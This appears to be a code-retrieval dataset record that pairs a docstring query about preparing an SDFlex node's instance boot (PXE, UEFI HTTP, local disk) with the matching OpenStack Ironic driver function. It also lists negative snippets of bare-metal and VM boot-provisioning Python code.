"def prepare_instance(self, task):\n boot_mode_utils.sync_boot_mode(task)\n node = task.node\n boot_device = None\n boot_option = deploy_utils.get_boot_option(node)\n if boot_option != \"kickstart\":\n boot_mode_utils.configure_secure_boot_if_needed(task)\n\n instance_image_info = {}\n if boot_option == \"ramdisk\" or boot_option == \"kickstart\":\n instance_image_info = pxe_utils.get_instance_image_info(\n task, ipxe_enabled=self.ipxe_enabled)\n pxe_utils.cache_ramdisk_kernel(task, instance_image_info,\n ipxe_enabled=self.ipxe_enabled)\n if 'ks_template' in instance_image_info:\n ks_cfg = pxe_utils.validate_kickstart_template(\n instance_image_info['ks_template'][1]\n )\n pxe_utils.validate_kickstart_file(ks_cfg)\n\n if (deploy_utils.is_iscsi_boot(task) or boot_option == \"ramdisk\"\n or boot_option == \"kickstart\"):\n pxe_utils.prepare_instance_pxe_config(\n task, instance_image_info,\n iscsi_boot=deploy_utils.is_iscsi_boot(task),\n ramdisk_boot=(boot_option == \"ramdisk\"),\n anaconda_boot=(boot_option == \"kickstart\"),\n ipxe_enabled=self.ipxe_enabled)\n pxe_utils.prepare_instance_kickstart_config(\n task, instance_image_info,\n anaconda_boot=(boot_option == \"kickstart\"))\n boot_device = boot_devices.PXE\n\n else:\n # NOTE(dtantsur): create a PXE configuration as a safety net for\n # hardware uncapable of persistent boot. If on a reboot it will try\n # to boot from PXE, this configuration will return it back.\n if CONF.pxe.enable_netboot_fallback:\n pxe_utils.build_service_pxe_config(\n task, instance_image_info,\n task.node.driver_internal_info.get('root_uuid_or_disk_id'),\n ipxe_enabled=self.ipxe_enabled,\n # PXE config for whole disk images is identical to what\n # we need to boot from local disk, so use True even\n # for partition images.\n is_whole_disk_image=True)\n else:\n # Clean up the deployment configuration\n pxe_utils.clean_up_pxe_config(\n task, ipxe_enabled=self.ipxe_enabled)\n boot_device = boot_devices.DISK\n\n # NOTE(pas-ha) do not re-set boot device on ACTIVE nodes\n # during takeover\n if boot_device and task.node.provision_state != states.ACTIVE:\n manager_utils.node_set_boot_device(task, boot_device,\n persistent=True)",
"def prepare_ramdisk(self, task, ramdisk_params):\n if task.node.provision_state in (states.DEPLOYING, states.RESCUING,\n states.CLEANING, states.INSPECTING):\n node = task.node\n d_info = redfish_boot._parse_driver_info(node)\n # Label indicating a deploy or rescue operation being carried out\n # on the node, 'deploy' or 'rescue'. Unless the node is in a\n # rescue like state, the mode is set to 'deploy', indicating\n # deploy operation is being carried out.\n\n mode = deploy_utils.rescue_or_deploy_mode(node)\n\n iso_ref = image_utils.prepare_deploy_iso(task, ramdisk_params,\n mode, d_info)\n node.driver_internal_info.update({'deploy_boot_iso': iso_ref})\n\n sdflex_common.set_network_setting_dhcpless_boot(node, iso_ref)\n boot_mode_utils.sync_boot_mode(task)\n manager_utils.node_set_boot_device(task, boot_devices.UEFIHTTP,\n persistent=False)",
"def prepare_instance(self, task):\n # Need to enable secure boot, if being requested.\n # update_secure_boot_mode checks and enables secure boot only if the\n # deploy has requested secure boot\n boot_option = deploy_utils.get_boot_option(task.node)\n if boot_option != \"kickstart\":\n sdflex_common.update_secure_boot_mode(task, True)\n if not http_utils.is_http_boot_requested(task.node):\n if boot_option == \"kickstart\":\n prepare_node_for_deploy(task)\n super(SdflexPXEBoot, self).prepare_instance(task)\n else:\n boot_mode_utils.sync_boot_mode(task)\n node = task.node\n boot_option = deploy_utils.get_boot_option(node)\n boot_device = None\n instance_image_info = {}\n if boot_option == \"ramdisk\":\n instance_image_info = http_utils.get_instance_image_info(task)\n http_utils.cache_ramdisk_kernel(task, instance_image_info)\n if deploy_utils.is_iscsi_boot(task) or boot_option == \"ramdisk\":\n http_utils.prepare_instance_http_config(\n task, instance_image_info,\n iscsi_boot=deploy_utils.is_iscsi_boot(task),\n ramdisk_boot=(boot_option == \"ramdisk\"))\n if http_utils.is_http_boot_requested(task.node):\n boot_device = boot_devices.UEFIHTTP\n else:\n boot_device = boot_devices.PXE\n elif boot_option != \"local\":\n if task.driver.storage.should_write_image(task):\n # Make sure that the instance kernel/ramdisk is cached.\n # This is for the takeover scenario for active nodes.\n instance_image_info = (\n http_utils.get_instance_image_info(task))\n http_utils.cache_ramdisk_kernel(task, instance_image_info)\n iwdi = (\n task.node.driver_internal_info.get('is_whole_disk_image'))\n try:\n root_uuid_or_disk_id = task.node.driver_internal_info[\n 'root_uuid_or_disk_id'\n ]\n except KeyError:\n if not task.driver.storage.should_write_image(task):\n pass\n elif not iwdi:\n LOG.warning(\"The UUID for the root partition can't be\"\n \" found, unable to switch the pxe config \"\n \"from deployment mode to service (boot) \"\n \"mode for node %(node)s\",\n {\"node\": task.node.uuid})\n else:\n LOG.warning(\"The disk id for the whole disk image \"\n \"can't be found, unable to switch the \"\n \"pxe config from deployment mode to \"\n \"service (boot) mode for node %(node)s. \"\n \"Booting the instance from disk.\",\n {\"node\": task.node.uuid})\n http_utils.clean_up_http_config(task)\n boot_device = boot_devices.DISK\n else:\n http_utils.build_service_http_config(task,\n instance_image_info,\n root_uuid_or_disk_id)\n if http_utils.is_http_boot_requested(task.node):\n boot_device = boot_devices.UEFIHTTP\n else:\n boot_device = boot_devices.PXE\n else:\n # If it's going to boot from the local disk, we don't need\n # PXE config files. They still need to be generated as part\n # of the prepare() because the deployment does PXE boot the\n # deploy ramdisk\n http_utils.clean_up_http_config(task)\n boot_device = boot_devices.DISK\n\n # NOTE(pas-ha) do not re-set boot device on ACTIVE nodes\n # during takeover\n if boot_device and task.node.provision_state != states.ACTIVE:\n persistent = True\n if node.driver_info.get('force_persistent_boot_device',\n 'Default') == 'Never':\n persistent = False\n manager_utils.node_set_boot_device(task, boot_device,\n persistent=persistent)",
"def prepare_ramdisk(self, task, ramdisk_params):\n node = task.node\n remote_server_data = {}\n remote_image_server = node.driver_info.get('remote_image_server')\n remote_image_share_root = node.driver_info.get(\n 'remote_image_share_root')\n remote_server_data['remote_image_share_type'] = (\n node.driver_info.get('remote_image_share_type'))\n remote_server_data['remote_image_user_name'] = (\n node.driver_info.get('remote_image_user_name', None))\n remote_server_data['remote_image_user_password'] = (\n node.driver_info.get('remote_image_user_password', None))\n\n # NOTE(TheJulia): If this method is being called by something\n # aside from deployment, clean and rescue, such as conductor takeover,\n # we should treat this as a no-op and move on otherwise we would\n # modify the state of the node due to virtual media operations.\n if node.provision_state not in (states.DEPLOYING,\n states.CLEANING,\n states.RESCUING,\n states.INSPECTING):\n return\n\n # NOTE(TheJulia): Since we're deploying, cleaning, or rescuing,\n # with virtual media boot, we should generate a token!\n manager_utils.add_secret_token(node, pregenerated=True)\n node.save()\n ramdisk_params['ipa-agent-token'] = (\n node.driver_internal_info['agent_secret_token'])\n\n manager_utils.node_power_action(task, states.POWER_OFF)\n\n deploy_nic_mac = deploy_utils.get_single_nic_with_vif_port_id(task)\n ramdisk_params['BOOTIF'] = deploy_nic_mac\n if CONF.debug and 'ipa-debug' not in ramdisk_params:\n ramdisk_params['ipa-debug'] = '1'\n\n mode = deploy_utils.rescue_or_deploy_mode(node)\n iso_ref = self._prepare_deploy_iso(task, ramdisk_params, mode)\n\n url = (remote_server_data['remote_image_share_type'] + \"://\" +\n remote_image_server + \"/\" + remote_image_share_root + \"/\" +\n iso_ref)\n\n sdflex_common.eject_vmedia(task,\n vmedia_device)\n sdflex_common.insert_vmedia(task, url,\n vmedia_device,\n remote_server_data)\n\n boot_mode_utils.sync_boot_mode(task)\n\n self._set_boot_device(task, boot_devices.CD.value.lower())\n\n LOG.debug(\"Node %(node)s is set to one time boot from \"\n \"%(device)s\", {'node': task.node.uuid,\n 'device': boot_devices.CD})",
"def _prepare_boot_iso(self, task, root_uuid=None):\n node = task.node\n d_info = redfish_boot._parse_deploy_info(node)\n\n kernel_href = node.instance_info.get('kernel')\n ramdisk_href = node.instance_info.get('ramdisk')\n\n if not kernel_href or not ramdisk_href:\n\n image_href = d_info['image_source']\n\n image_properties = (\n images.get_image_properties(\n task.context, image_href, ['kernel_id', 'ramdisk_id']))\n\n if not kernel_href:\n kernel_href = image_properties.get('kernel_id')\n\n if not ramdisk_href:\n ramdisk_href = image_properties.get('ramdisk_id')\n\n if not kernel_href or not ramdisk_href:\n raise exception.InvalidParameterValue(_(\n \"Unable to find kernel or ramdisk for \"\n \"to generate boot ISO for %(node)s\") %\n {'node': task.node.uuid})\n\n bootloader_href = d_info.get('bootloader')\n\n return self._prepare_iso_image(\n task, kernel_href, ramdisk_href, bootloader_href,\n root_uuid=root_uuid)",
"def prepare_instance(self, task):\n node = task.node\n\n boot_option = deploy_utils.get_boot_option(node)\n\n self.clean_up_instance(task)\n\n remote_image_server = node.driver_info.get('remote_image_server')\n remote_image_share_root = node.driver_info.get(\n 'remote_image_share_root')\n\n remote_server_data = {}\n remote_server_data['remote_image_share_type'] = (\n node.driver_info.get('remote_image_share_type'))\n remote_server_data['remote_image_user_name'] = (\n node.driver_info.get('remote_image_user_name', None))\n remote_server_data['remote_image_user_password'] = (\n node.driver_info.get('remote_image_user_password', None))\n\n # Need to enable secure boot, if being requested.\n # update_secure_boot_mode checks and enables secure boot only if the\n # deploy has requested secure boot\n sdflex_common.update_secure_boot_mode(task, True)\n iwdi = node.driver_internal_info.get('is_whole_disk_image')\n if boot_option == \"local\" or iwdi:\n self._set_boot_device(\n task, boot_devices.DISK, persistent=True)\n\n LOG.debug(\"Node %(node)s is set to permanently boot from local \"\n \"%(device)s\", {'node': task.node.uuid,\n 'device': boot_devices.DISK})\n return\n\n params = {}\n\n if boot_option != 'ramdisk':\n root_uuid = node.driver_internal_info.get('root_uuid_or_disk_id')\n\n if not root_uuid and task.driver.storage.should_write_image(task):\n LOG.warning(\n \"The UUID of the root partition could not be found for \"\n \"node %s. Booting instance from disk anyway.\", node.uuid)\n\n self._set_boot_device(\n task, boot_devices.DISK, persistent=True)\n\n return\n\n params.update(root_uuid=root_uuid)\n\n iso_ref = self._prepare_boot_iso(task, **params)\n\n url = (remote_server_data['remote_image_share_type'] + \"://\" +\n remote_image_server + \"/\" + remote_image_share_root + \"/\" +\n iso_ref)\n\n sdflex_common.eject_vmedia(task,\n vmedia_device)\n sdflex_common.insert_vmedia(task, url,\n vmedia_device,\n remote_server_data)\n\n boot_mode_utils.sync_boot_mode(task)\n\n self._set_boot_device(\n task, boot_devices.CD.value.lower(), persistent=True)\n\n LOG.debug(\"Node %(node)s is set to permanently boot from \"\n \"%(device)s\", {'node': task.node.uuid,\n 'device': boot_devices.CD})",
"def _prepare_iso_image(self, task, kernel_href, ramdisk_href,\n bootloader_href=None, configdrive=None,\n root_uuid=None, params=None):\n if not kernel_href or not ramdisk_href:\n raise exception.InvalidParameterValue(_(\n \"Unable to find kernel or ramdisk for \"\n \"building ISO for %(node)s\") %\n {'node': task.node.uuid})\n\n i_info = task.node.instance_info\n driver_info = task.node.driver_info\n if driver_info.get('remote_image_share_type') == 'nfs':\n image_share_root = driver_info.get('remote_image_share_root')\n else:\n image_share_root = driver_info.get('image_share_root')\n if deploy_utils.get_boot_option(task.node) == \"ramdisk\":\n kernel_params = \"root=/dev/ram0 text \"\n kernel_params += i_info.get(\"ramdisk_kernel_arguments\", \"\")\n\n else:\n kernel_params = i_info.get('kernel_append_params', \"\")\n\n if params:\n kernel_params = ' '.join(\n (kernel_params, ' '.join(\n '%s=%s' % kv for kv in params.items())))\n\n boot_mode = boot_mode_utils.get_boot_mode_for_deploy(task.node)\n\n LOG.debug(\"Trying to create %(boot_mode)s ISO image for node %(node)s \"\n \"with kernel %(kernel_href)s, ramdisk %(ramdisk_href)s, \"\n \"bootloader %(bootloader_href)s and kernel params %(params)s\"\n \"\", {'node': task.node.uuid,\n 'boot_mode': boot_mode,\n 'kernel_href': kernel_href,\n 'ramdisk_href': ramdisk_href,\n 'bootloader_href': bootloader_href,\n 'params': kernel_params})\n\n with tempfile.NamedTemporaryFile(\n dir=CONF.tempdir, suffix='.iso') as boot_fileobj:\n\n with tempfile.NamedTemporaryFile(\n dir=CONF.tempdir, suffix='.img') as cfgdrv_fileobj:\n\n configdrive_href = configdrive\n\n if configdrive:\n parsed_url = urlparse.urlparse(configdrive)\n if not parsed_url.scheme:\n cfgdrv_blob = base64.decode_as_bytes(configdrive)\n\n with open(cfgdrv_fileobj.name, 'wb') as f:\n f.write(cfgdrv_blob)\n\n configdrive_href = urlparse.urlunparse(\n ('file', '', cfgdrv_fileobj.name, '', '', ''))\n\n LOG.info(\"Burning configdrive %(url)s to boot ISO image \"\n \"for node %(node)s\", {'url': configdrive_href,\n 'node': task.node.uuid})\n boot_iso_tmp_file = boot_fileobj.name\n\n images.create_boot_iso(\n task.context, boot_iso_tmp_file,\n kernel_href, ramdisk_href,\n esp_image_href=bootloader_href,\n root_uuid=root_uuid,\n kernel_params=kernel_params,\n boot_mode=boot_mode)\n iso_object_name = self._get_iso_image_name(task.node)\n\n image_url = self._publish_image(\n boot_iso_tmp_file, iso_object_name, image_share_root)\n\n LOG.debug(\"Created ISO %(name)s in NFS/CIFS for node %(node)s, \"\n \"exposed as temporary URL \"\n \"%(url)s\", {'node': task.node.uuid,\n 'name': iso_object_name,\n 'url': image_url})\n\n return image_url",
"def prepare_instance(self, task):\n\n # Need to enable secure boot, if being requested.\n # update_secure_boot_mode checks and enables secure boot only if the\n # deploy has requested secure boot\n sdflex_common.update_secure_boot_mode(task, True)\n\n boot_mode_utils.sync_boot_mode(task)\n node = task.node\n boot_device = None\n\n self.clean_up_instance(task)\n boot_device = boot_devices.DISK\n\n if boot_device and task.node.provision_state != states.ACTIVE:\n persistent = True\n if node.driver_info.get('force_persistent_boot_device',\n 'Default') == 'Never':\n persistent = False\n manager_utils.node_set_boot_device(task, boot_device,\n persistent=persistent)",
"def setupBootRegion(self):\n self.virtualMemoryRequest(\n \"PhysicalRegion\",\n {\n \"RegionType\": \"BootRegion\",\n \"Size\": PcConfig.get_boot_region_size(),\n \"Type\": \"I\",\n \"Bank\": 0,\n },\n )",
"def prepVm(self):\r\n self.server.logMsg(\"PREPARING \" + self.vmName + \" FOR TESTING\")\r\n self.server.logMsg(self.vmName + \" OPERATING SYSTEM: \" + self.vmOS)\r\n self.server.logMsg(self.vmName + \" ARCHITECTURE: \" + self.getArch())\r\n self.getSnapshots()\r\n self.powerOn(False)",
"def _prepare_deploy_iso(self, task, params, mode):\n node = task.node\n d_info = redfish_boot._parse_driver_info(node)\n\n kernel_href = d_info.get('%s_kernel' % mode)\n ramdisk_href = d_info.get('%s_ramdisk' % mode)\n bootloader_href = d_info.get('bootloader')\n\n return self._prepare_iso_image(\n task, kernel_href, ramdisk_href, bootloader_href, params=params)",
"def bootNodes(self):\n self.libvirt.bootSlaves()",
"def boot_installer(self):\n boot_timeout = int(config.get('iso_installer', 'BOOT_TIMEOUT'))\n self.child.expect('Escape character')\n LOG.info('connected to the VM (controller-0)')\n # send a escape character\n self.child.sendline('\\x1b')\n self.child.expect('boot:')\n cmd_boot_line = common.get_cmd_boot_line()\n self.child.sendline(cmd_boot_line)\n LOG.info('kernel command line sent: %s', cmd_boot_line)\n # send a enter character\n self.child.sendline('\\r')\n # setting a boot timeout\n self.child.timeout = boot_timeout\n self.child.expect('Loading vmlinuz')\n LOG.info('Loading vmlinuz')\n self.child.expect('Loading initrd.img')\n LOG.info('Loading initrd.img')\n self.child.expect('Starting installer, one moment...')\n LOG.info('Starting installer ...')\n self.child.expect('Performing post-installation setup tasks')\n LOG.info('Performing post-installation setup tasks')",
"def do_prepare_partition(cls, part, source_params, creator, cr_workdir,\n oe_builddir, bootimg_dir, kernel_dir,\n rootfs_dir, native_sysroot):\n\n # We rely on the --label parameter and the naming convention\n # in partition.py prepare_rootfs() here to find the already\n # prepared rootfs partition image.\n pattern = '%s/rootfs_%s.*' % (cr_workdir, part.label)\n rootfs = glob.glob(pattern)\n if len(rootfs) != 1:\n raise WicError(\"%s shell pattern does not match exactly one rootfs image (missing --label parameter?): %s\" % (pattern, rootfs))\n else:\n rootfs = rootfs[0]\n logger.debug(\"Calculating dm-verity hash for rootfs %s (native %s).\" % (rootfs, native_sysroot))\n\n hashimg = '%s/dm-verity_%s.img' % (cr_workdir, part.label)\n # Reserve some fixed amount of space at the start of the hash image\n # for our own data (in particular, the signed root hash).\n # The content of that part is:\n # roothash=<....>\n # <potentially some more assignments in the future>\n # signature=<single line of base64 encoded OpenSSL sha256 digest>\n header_size = 4096\n ret, out = exec_native_cmd(\"veritysetup format '%s' '%s' --hash-offset=%d\" %\n (rootfs, hashimg, header_size),\n native_sysroot)\n m = re.search(r'^Root hash:\\s*(\\S+)$', out, re.MULTILINE)\n if ret or not m:\n raise WicError('veritysetup failed: %s' % out)\n else:\n root_hash = m.group(1)\n privkey = get_bitbake_var('REFKIT_DMVERITY_PRIVATE_KEY')\n password = get_bitbake_var('REFKIT_DMVERITY_PASSWORD')\n tmp = tempfile.mkdtemp(prefix='dm-verity-')\n try:\n data_filename = os.path.join(tmp, 'data')\n header = ('roothash=%s\\nheadersize=%d\\n' % (root_hash, header_size)).encode('ascii')\n with open(data_filename, 'wb') as data:\n data.write(header)\n # Must use a temporary file, exec_native_cmd() only supports UTF-8 output.\n signature = os.path.join(tmp, 'sig')\n ret, out = exec_native_cmd(\"openssl dgst -sha256 -passin '%s' -sign '%s' -out '%s' '%s'\" %\n (password, privkey, signature, data_filename),\n native_sysroot)\n if ret:\n raise WicError('openssl signing failed')\n with open(signature, 'rb') as f:\n header += b'signature=' + base64.standard_b64encode(f.read()) + b'\\n'\n if len(header) + 1 >= header_size:\n raise WicError('reserved space for dm-verity header too small')\n with open(hashimg, 'rb+') as hash:\n hash.write(header)\n finally:\n shutil.rmtree(tmp)\n\n data_bytes = os.stat(rootfs).st_size\n hash_bytes = os.stat(hashimg).st_size\n logger.debug(\"dm-verity data partition %d bytes, hash partition %d bytes, ratio %f.\" %\n (data_bytes, hash_bytes, data_bytes / hash_bytes))\n part.size = data_bytes // 1024\n part.source_file = hashimg",
"def bootMaster(self):\n self.libvirt.bootMaster()\n time.sleep(100)",
"def generate_ipxe_boot_file(self):\n logging.info('Creating image \\'' + self.name + '\\' IPXE boot file')\n\n # Format image ipxe boot file template with image attributes\n file_content = self.__class__.get_boot_file_template().format(image_name=self.name,\n image_initramfs=self.image,\n image_kernel=self.kernel)\n\n # Create ipxe boot file\n logging.debug('Creating boot content inside file ' + self.IMAGE_DIRECTORY + 'boot.ipxe')\n with open(self.IMAGE_DIRECTORY + 'boot.ipxe', \"w\") as ff:\n ff.write(file_content)",
"def clean_up_ramdisk(self, task):\n node = task.node\n mode = deploy_utils.rescue_or_deploy_mode(node)\n try:\n images_info = pxe_utils.get_image_info(\n node, mode=mode, ipxe_enabled=self.ipxe_enabled)\n except exception.MissingParameterValue as e:\n LOG.warning('Could not get %(mode)s image info '\n 'to clean up images for node %(node)s: %(err)s',\n {'mode': mode, 'node': node.uuid, 'err': e})\n else:\n pxe_utils.clean_up_pxe_env(\n task, images_info, ipxe_enabled=self.ipxe_enabled)",
"def prepare(topology='devstack'):\n log.info(\"Preparing boxes for %s Openstack\" % topology)\n log.info(\"Preparing virtual machines for lab=%s\" % LAB)\n url = IMAGES_REPO + DEVSTACK_DISK\n local(\"test -e %s || wget -nv %s\" % (DEVSTACK_DISK, url))\n local(\"python ./tools/cloud/create.py -l {lab} -s /opt/imgs \"\n \"-z ./{disk} -t {topo} > config_file\".format(lab=LAB,\n disk=DEVSTACK_DISK,\n topo=topology))"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Prepares the boot of instance. This method prepares the boot of the instance after reading relevant information from the node's instance_info. In case of UEFI HTTP Boot, it switches to UEFI HTTP config. In case of localboot, it cleans up the PXE config. In case of 'boot from volume', it updates the iSCSI info onto SDFlex and sets the node to boot from 'UefiTarget' boot device.
|
def prepare_instance(self, task):
# Need to enable secure boot, if being requested.
# update_secure_boot_mode checks and enables secure boot only if the
# deploy has requested secure boot
boot_option = deploy_utils.get_boot_option(task.node)
if boot_option != "kickstart":
sdflex_common.update_secure_boot_mode(task, True)
if not http_utils.is_http_boot_requested(task.node):
if boot_option == "kickstart":
prepare_node_for_deploy(task)
super(SdflexPXEBoot, self).prepare_instance(task)
else:
boot_mode_utils.sync_boot_mode(task)
node = task.node
boot_option = deploy_utils.get_boot_option(node)
boot_device = None
instance_image_info = {}
if boot_option == "ramdisk":
instance_image_info = http_utils.get_instance_image_info(task)
http_utils.cache_ramdisk_kernel(task, instance_image_info)
if deploy_utils.is_iscsi_boot(task) or boot_option == "ramdisk":
http_utils.prepare_instance_http_config(
task, instance_image_info,
iscsi_boot=deploy_utils.is_iscsi_boot(task),
ramdisk_boot=(boot_option == "ramdisk"))
if http_utils.is_http_boot_requested(task.node):
boot_device = boot_devices.UEFIHTTP
else:
boot_device = boot_devices.PXE
elif boot_option != "local":
if task.driver.storage.should_write_image(task):
# Make sure that the instance kernel/ramdisk is cached.
# This is for the takeover scenario for active nodes.
instance_image_info = (
http_utils.get_instance_image_info(task))
http_utils.cache_ramdisk_kernel(task, instance_image_info)
iwdi = (
task.node.driver_internal_info.get('is_whole_disk_image'))
try:
root_uuid_or_disk_id = task.node.driver_internal_info[
'root_uuid_or_disk_id'
]
except KeyError:
if not task.driver.storage.should_write_image(task):
pass
elif not iwdi:
LOG.warning("The UUID for the root partition can't be"
" found, unable to switch the pxe config "
"from deployment mode to service (boot) "
"mode for node %(node)s",
{"node": task.node.uuid})
else:
LOG.warning("The disk id for the whole disk image "
"can't be found, unable to switch the "
"pxe config from deployment mode to "
"service (boot) mode for node %(node)s. "
"Booting the instance from disk.",
{"node": task.node.uuid})
http_utils.clean_up_http_config(task)
boot_device = boot_devices.DISK
else:
http_utils.build_service_http_config(task,
instance_image_info,
root_uuid_or_disk_id)
if http_utils.is_http_boot_requested(task.node):
boot_device = boot_devices.UEFIHTTP
else:
boot_device = boot_devices.PXE
else:
# If it's going to boot from the local disk, we don't need
# PXE config files. They still need to be generated as part
# of the prepare() because the deployment does PXE boot the
# deploy ramdisk
http_utils.clean_up_http_config(task)
boot_device = boot_devices.DISK
# NOTE(pas-ha) do not re-set boot device on ACTIVE nodes
# during takeover
if boot_device and task.node.provision_state != states.ACTIVE:
persistent = True
if node.driver_info.get('force_persistent_boot_device',
'Default') == 'Never':
persistent = False
manager_utils.node_set_boot_device(task, boot_device,
persistent=persistent)
|
[
"def prepare_instance(self, task):\n boot_mode_utils.sync_boot_mode(task)\n node = task.node\n boot_device = None\n boot_option = deploy_utils.get_boot_option(node)\n if boot_option != \"kickstart\":\n boot_mode_utils.configure_secure_boot_if_needed(task)\n\n instance_image_info = {}\n if boot_option == \"ramdisk\" or boot_option == \"kickstart\":\n instance_image_info = pxe_utils.get_instance_image_info(\n task, ipxe_enabled=self.ipxe_enabled)\n pxe_utils.cache_ramdisk_kernel(task, instance_image_info,\n ipxe_enabled=self.ipxe_enabled)\n if 'ks_template' in instance_image_info:\n ks_cfg = pxe_utils.validate_kickstart_template(\n instance_image_info['ks_template'][1]\n )\n pxe_utils.validate_kickstart_file(ks_cfg)\n\n if (deploy_utils.is_iscsi_boot(task) or boot_option == \"ramdisk\"\n or boot_option == \"kickstart\"):\n pxe_utils.prepare_instance_pxe_config(\n task, instance_image_info,\n iscsi_boot=deploy_utils.is_iscsi_boot(task),\n ramdisk_boot=(boot_option == \"ramdisk\"),\n anaconda_boot=(boot_option == \"kickstart\"),\n ipxe_enabled=self.ipxe_enabled)\n pxe_utils.prepare_instance_kickstart_config(\n task, instance_image_info,\n anaconda_boot=(boot_option == \"kickstart\"))\n boot_device = boot_devices.PXE\n\n else:\n # NOTE(dtantsur): create a PXE configuration as a safety net for\n # hardware uncapable of persistent boot. If on a reboot it will try\n # to boot from PXE, this configuration will return it back.\n if CONF.pxe.enable_netboot_fallback:\n pxe_utils.build_service_pxe_config(\n task, instance_image_info,\n task.node.driver_internal_info.get('root_uuid_or_disk_id'),\n ipxe_enabled=self.ipxe_enabled,\n # PXE config for whole disk images is identical to what\n # we need to boot from local disk, so use True even\n # for partition images.\n is_whole_disk_image=True)\n else:\n # Clean up the deployment configuration\n pxe_utils.clean_up_pxe_config(\n task, ipxe_enabled=self.ipxe_enabled)\n boot_device = boot_devices.DISK\n\n # NOTE(pas-ha) do not re-set boot device on ACTIVE nodes\n # during takeover\n if boot_device and task.node.provision_state != states.ACTIVE:\n manager_utils.node_set_boot_device(task, boot_device,\n persistent=True)",
"def prepare_instance(self, task):\n node = task.node\n\n boot_option = deploy_utils.get_boot_option(node)\n\n self.clean_up_instance(task)\n\n remote_image_server = node.driver_info.get('remote_image_server')\n remote_image_share_root = node.driver_info.get(\n 'remote_image_share_root')\n\n remote_server_data = {}\n remote_server_data['remote_image_share_type'] = (\n node.driver_info.get('remote_image_share_type'))\n remote_server_data['remote_image_user_name'] = (\n node.driver_info.get('remote_image_user_name', None))\n remote_server_data['remote_image_user_password'] = (\n node.driver_info.get('remote_image_user_password', None))\n\n # Need to enable secure boot, if being requested.\n # update_secure_boot_mode checks and enables secure boot only if the\n # deploy has requested secure boot\n sdflex_common.update_secure_boot_mode(task, True)\n iwdi = node.driver_internal_info.get('is_whole_disk_image')\n if boot_option == \"local\" or iwdi:\n self._set_boot_device(\n task, boot_devices.DISK, persistent=True)\n\n LOG.debug(\"Node %(node)s is set to permanently boot from local \"\n \"%(device)s\", {'node': task.node.uuid,\n 'device': boot_devices.DISK})\n return\n\n params = {}\n\n if boot_option != 'ramdisk':\n root_uuid = node.driver_internal_info.get('root_uuid_or_disk_id')\n\n if not root_uuid and task.driver.storage.should_write_image(task):\n LOG.warning(\n \"The UUID of the root partition could not be found for \"\n \"node %s. Booting instance from disk anyway.\", node.uuid)\n\n self._set_boot_device(\n task, boot_devices.DISK, persistent=True)\n\n return\n\n params.update(root_uuid=root_uuid)\n\n iso_ref = self._prepare_boot_iso(task, **params)\n\n url = (remote_server_data['remote_image_share_type'] + \"://\" +\n remote_image_server + \"/\" + remote_image_share_root + \"/\" +\n iso_ref)\n\n sdflex_common.eject_vmedia(task,\n vmedia_device)\n sdflex_common.insert_vmedia(task, url,\n vmedia_device,\n remote_server_data)\n\n boot_mode_utils.sync_boot_mode(task)\n\n self._set_boot_device(\n task, boot_devices.CD.value.lower(), persistent=True)\n\n LOG.debug(\"Node %(node)s is set to permanently boot from \"\n \"%(device)s\", {'node': task.node.uuid,\n 'device': boot_devices.CD})",
"def prepare_instance(self, task):\n\n # Need to enable secure boot, if being requested.\n # update_secure_boot_mode checks and enables secure boot only if the\n # deploy has requested secure boot\n sdflex_common.update_secure_boot_mode(task, True)\n\n boot_mode_utils.sync_boot_mode(task)\n node = task.node\n boot_device = None\n\n self.clean_up_instance(task)\n boot_device = boot_devices.DISK\n\n if boot_device and task.node.provision_state != states.ACTIVE:\n persistent = True\n if node.driver_info.get('force_persistent_boot_device',\n 'Default') == 'Never':\n persistent = False\n manager_utils.node_set_boot_device(task, boot_device,\n persistent=persistent)",
"def prepare_ramdisk(self, task, ramdisk_params):\n if task.node.provision_state in (states.DEPLOYING, states.RESCUING,\n states.CLEANING, states.INSPECTING):\n prepare_node_for_deploy(task)\n if not http_utils.is_http_boot_requested(task.node):\n super(SdflexPXEBoot, self).prepare_ramdisk(task, ramdisk_params)\n else:\n node = task.node\n # Label indicating a deploy or rescue operation being carried out\n # on the node, 'deploy' or 'rescue'. Unless the node is in a\n # rescue like state, the mode is set to 'deploy', indicating\n # deploy operation is being carried out.\n mode = deploy_utils.rescue_or_deploy_mode(node)\n\n http_info = http_utils.get_image_info(node, mode=mode)\n\n # NODE: Try to validate and fetch instance images only\n # if we are in DEPLOYING state.\n if node.provision_state == states.DEPLOYING:\n http_info.update(http_utils.get_instance_image_info(task))\n boot_mode_utils.sync_boot_mode(task)\n\n http_options = http_utils.build_http_config_options(task,\n http_info)\n http_options.update(ramdisk_params)\n http_config_template = deploy_utils.get_pxe_config_template(node)\n http_utils.create_http_config(task, http_options,\n http_config_template)\n manager_utils.node_set_boot_device(task, boot_devices.UEFIHTTP,\n persistent=False)\n if http_info:\n http_utils.cache_ramdisk_kernel(task, http_info)\n bfpv = str(task.node.driver_info.get('bfpv', 'false')).lower()\n if bfpv == 'true':\n node = task.node\n driver_internal_info = node.driver_internal_info\n driver_internal_info['bfpv_started'] = 'false'\n node.driver_internal_info = driver_internal_info\n node.save()",
"def _prepare_boot_iso(self, task, root_uuid=None):\n node = task.node\n d_info = redfish_boot._parse_deploy_info(node)\n\n kernel_href = node.instance_info.get('kernel')\n ramdisk_href = node.instance_info.get('ramdisk')\n\n if not kernel_href or not ramdisk_href:\n\n image_href = d_info['image_source']\n\n image_properties = (\n images.get_image_properties(\n task.context, image_href, ['kernel_id', 'ramdisk_id']))\n\n if not kernel_href:\n kernel_href = image_properties.get('kernel_id')\n\n if not ramdisk_href:\n ramdisk_href = image_properties.get('ramdisk_id')\n\n if not kernel_href or not ramdisk_href:\n raise exception.InvalidParameterValue(_(\n \"Unable to find kernel or ramdisk for \"\n \"to generate boot ISO for %(node)s\") %\n {'node': task.node.uuid})\n\n bootloader_href = d_info.get('bootloader')\n\n return self._prepare_iso_image(\n task, kernel_href, ramdisk_href, bootloader_href,\n root_uuid=root_uuid)",
